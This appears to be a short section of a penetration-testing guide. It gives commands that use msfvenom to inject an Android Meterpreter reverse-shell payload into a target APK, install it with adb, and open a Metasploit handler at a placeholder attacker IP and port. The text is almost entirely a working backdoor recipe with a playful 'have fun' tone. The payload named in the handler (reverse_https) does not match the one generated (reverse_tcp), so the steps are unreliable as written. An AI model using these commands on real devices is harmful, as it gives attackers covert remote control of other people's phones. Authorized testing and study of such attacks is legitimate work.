4.2 Quick Proof-of-Concept (Meterpreter)
This guide revealed to me a functionality which I was not aware of - msfvenom does everything for you!
Create backdoored apk
msfvenom -x /path/to/target_app.apk -p android/meterpreter/reverse_tcp LHOSt=<ATTACKER-IP> LPORT=<ATTACKER-PORT> -o target_modified.apk
Output: Saved as: target_modified.apk
Install application
adb install target_modified.apk
Start meterpreter session handler
(use same IP & port as you used to generate the payload above):
msfconsole
use multi/handler
set payload android/meterpreter/reverse_https
set LHOST <ATTACKER-IP>
set LPORT <ATTACKER-PORT>
run
START APPLICATION ON DEVICE AND HAVE FUN!!! ;)
Last updated
Was this helpful?